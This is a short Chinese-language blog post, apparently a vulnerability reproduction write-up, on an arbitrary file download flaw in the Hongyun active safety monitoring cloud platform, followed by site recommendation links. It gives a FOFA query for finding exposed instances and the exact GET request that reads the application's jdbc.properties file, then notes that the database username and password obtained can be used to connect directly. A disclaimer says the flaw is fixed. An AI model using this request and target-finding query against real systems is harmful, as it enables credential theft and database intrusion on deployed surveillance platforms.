漏洞复现--鸿运主动安全监控云平台任意文件下载

免责声明:

**文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行

**

一:漏洞描述

深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。

二:漏洞影响版本

鸿运主动安全监控云平台

三:网络空间测绘查询

fofa:
body="./open/webApi.html"

四:漏洞复现

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

五:漏洞利用

读取到数据库账号密码,直接连接

相关推荐
思慕很大很大3 分钟前
Web安全:从“来源校验”到“CSRF Token”的演进
安全·浏览器
波兰的蓝4 分钟前
CVE-2016-4437 Apache Shiro反序列化漏洞复现
web安全·网络安全
2401_865382502 小时前
GB/T22240-2020《信息安全技术 网络安全等级保护定级指南》标准解读
网络安全·信息安全·等保测评·标准·信息化项目
Old Uncle Tom2 小时前
OpenClaw 的安全分析
网络·安全
努力的lpp2 小时前
小迪安全课程第一节复习笔记
网络安全
free_732 小时前
超越“回答”,AI Agent迎来全链路安全治理挑战
人工智能·python·网络安全
牢七3 小时前
jfinal_cms-v5.1.0 审计前缀
安全
骥龙3 小时前
第五篇:运行时安全——Docker沙箱与命令审批机制
安全·docker·容器
努力的lpp3 小时前
小迪安全课程第二节复习笔记
网络安全
上海云盾-小余3 小时前
零信任安全落地实战:企业如何构建无边界可信访问体系
网络·安全·web安全·架构